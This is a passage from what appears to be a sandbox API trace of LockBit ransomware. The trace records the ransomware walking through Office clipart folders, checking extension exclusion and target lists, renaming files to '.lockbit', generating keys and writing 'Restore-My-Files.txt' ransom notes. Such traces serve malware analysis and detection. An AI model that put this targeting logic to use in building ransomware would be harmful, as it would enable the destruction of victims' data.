ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x20ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB00673L.GIF", cAlternateFileName="")) returned 1 [0183.724] lstrcmpiW (lpString1=".", lpString2="WB00673L.GIF") returned -1 [0183.724] lstrcmpiW (lpString1="..", lpString2="WB00673L.GIF") returned -1 [0183.724] PathFindExtensionW (pszPath="WB00673L.GIF") returned=".GIF" [0183.724] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0183.724] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0183.724] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0183.724] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0183.724] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0183.724] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0183.724] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0183.724] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0183.724] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0183.725] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0183.725] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0183.725] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0183.725] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0183.725] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0183.725] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0183.725] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0183.725] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0183.725] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0183.725] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0183.725] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0183.725] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0183.725] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0183.725] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0183.725] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0183.725] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0183.725] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0183.725] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0183.725] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0183.725] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0183.725] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0183.725] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0183.725] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0183.725] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0183.725] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0183.725] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0183.725] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0183.726] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0183.726] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0183.726] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0183.726] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0183.726] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0183.726] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0183.726] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0183.726] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0183.726] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0183.726] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0183.726] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0183.726] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB00673L.GIF") returned -1 [0183.726] lstrcmpiW (lpString1="ntldr", lpString2="WB00673L.GIF") returned -1 [0183.726] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB00673L.GIF") returned -1 [0183.726] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB00673L.GIF") returned -1 [0183.726] lstrcmpiW (lpString1="autorun.inf", lpString2="WB00673L.GIF") returned -1 [0183.726] lstrcmpiW (lpString1="thumbs.db", lpString2="WB00673L.GIF") returned -1 [0183.726] lstrcmpiW (lpString1="iconcache.db", lpString2="WB00673L.GIF") returned -1 [0183.726] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0183.726] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00673L.GIF") returned=".GIF" [0183.726] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0183.726] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0183.726] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0183.726] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0183.726] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0183.726] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0183.726] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0183.726] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0183.727] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0183.727] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0183.727] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0183.727] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0183.727] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0183.727] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0183.727] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0183.727] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0183.727] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0183.727] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0183.727] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0183.727] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0183.727] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0183.727] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0183.727] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0183.727] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0183.727] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0183.727] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0183.727] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0183.727] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0183.727] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00673L.GIF.lockbit") returned 85 [0183.727] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00673L.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb00673l.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0183.729] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0183.729] malloc (_Size=0x40068) returned 0x1ff1e60 [0183.729] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8430) returned 1 [0183.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.729] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0183.730] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.730] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0183.730] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0184.478] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00673L.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00673L.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0184.478] malloc (_Size=0xc0) returned 0x1fa2ed8 [0184.478] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0xc0000008 [0184.478] free (_Block=0x1fa2ed8) [0184.478] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00673L.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0184.478] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0184.478] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0184.478] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x2026, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB00703L.GIF", cAlternateFileName="")) returned 1 [0184.478] lstrcmpiW (lpString1=".", lpString2="WB00703L.GIF") returned -1 [0184.478] lstrcmpiW (lpString1="..", lpString2="WB00703L.GIF") returned -1 [0184.478] PathFindExtensionW (pszPath="WB00703L.GIF") returned=".GIF" [0184.478] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0184.478] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0184.478] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0184.478] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0184.478] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0184.478] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0184.479] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0184.479] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0184.479] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0184.479] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0184.479] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0184.479] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0184.479] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0184.479] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0184.479] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0184.480] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0184.480] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0184.480] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0184.480] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0184.480] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0184.480] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0184.480] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.480] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0184.480] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0184.480] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0184.480] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0184.480] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB00703L.GIF") returned -1 [0184.480] lstrcmpiW (lpString1="ntldr", lpString2="WB00703L.GIF") returned -1 [0184.480] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB00703L.GIF") returned -1 [0184.480] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB00703L.GIF") returned -1 [0184.480] lstrcmpiW (lpString1="autorun.inf", lpString2="WB00703L.GIF") returned -1 [0184.480] lstrcmpiW (lpString1="thumbs.db", lpString2="WB00703L.GIF") returned -1 [0184.480] lstrcmpiW (lpString1="iconcache.db", lpString2="WB00703L.GIF") returned -1 [0184.480] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0184.480] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00703L.GIF") returned=".GIF" [0184.480] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0184.480] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0184.480] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0184.480] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0184.480] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0184.480] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0184.480] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0184.480] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0184.480] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0184.480] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0184.480] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0184.481] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0184.481] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0184.481] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0184.481] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0184.481] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0184.481] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0184.481] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0184.481] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0184.481] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0184.481] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0184.481] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0184.481] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0184.481] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0184.481] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0184.481] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0184.481] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0184.481] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0184.481] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00703L.GIF.lockbit") returned 85 [0184.481] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00703L.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb00703l.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0184.482] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0184.482] malloc (_Size=0x40068) returned 0x3df0008 [0184.482] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8230) returned 1 [0184.483] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.483] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0184.483] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.483] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0184.483] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0184.485] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00703L.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00703L.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0184.485] malloc (_Size=0xc0) returned 0x1fa2ed8 [0184.485] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0184.486] free (_Block=0x1fa2ed8) [0184.487] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00703L.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0184.487] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0184.487] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0184.487] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x2313, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB00760L.GIF", cAlternateFileName="")) returned 1 [0184.487] lstrcmpiW (lpString1=".", lpString2="WB00760L.GIF") returned -1 [0184.487] lstrcmpiW (lpString1="..", lpString2="WB00760L.GIF") returned -1 [0184.487] PathFindExtensionW (pszPath="WB00760L.GIF") returned=".GIF" [0184.487] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0184.487] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0184.487] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0184.487] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0184.487] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0184.487] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0184.487] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0184.487] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0184.487] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0184.487] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0184.487] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0184.487] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0184.487] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0184.487] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0184.487] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0184.487] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0184.487] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0184.487] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0184.488] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0184.488] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0184.488] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0184.488] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0184.488] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0184.488] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0184.489] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0184.489] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB00760L.GIF") returned -1 [0184.489] lstrcmpiW (lpString1="ntldr", lpString2="WB00760L.GIF") returned -1 [0184.489] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB00760L.GIF") returned -1 [0184.489] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB00760L.GIF") returned -1 [0184.489] lstrcmpiW (lpString1="autorun.inf", lpString2="WB00760L.GIF") returned -1 [0184.489] lstrcmpiW (lpString1="thumbs.db", lpString2="WB00760L.GIF") returned -1 [0184.489] lstrcmpiW (lpString1="iconcache.db", lpString2="WB00760L.GIF") returned -1 [0184.489] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0184.489] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00760L.GIF") returned=".GIF" [0184.489] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0184.489] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0184.489] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0184.489] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0184.489] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0184.489] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0184.489] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0184.489] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0184.489] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0184.489] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0184.489] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0184.489] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0184.489] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0184.489] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0184.489] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0184.490] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0184.490] lstrcmpiW 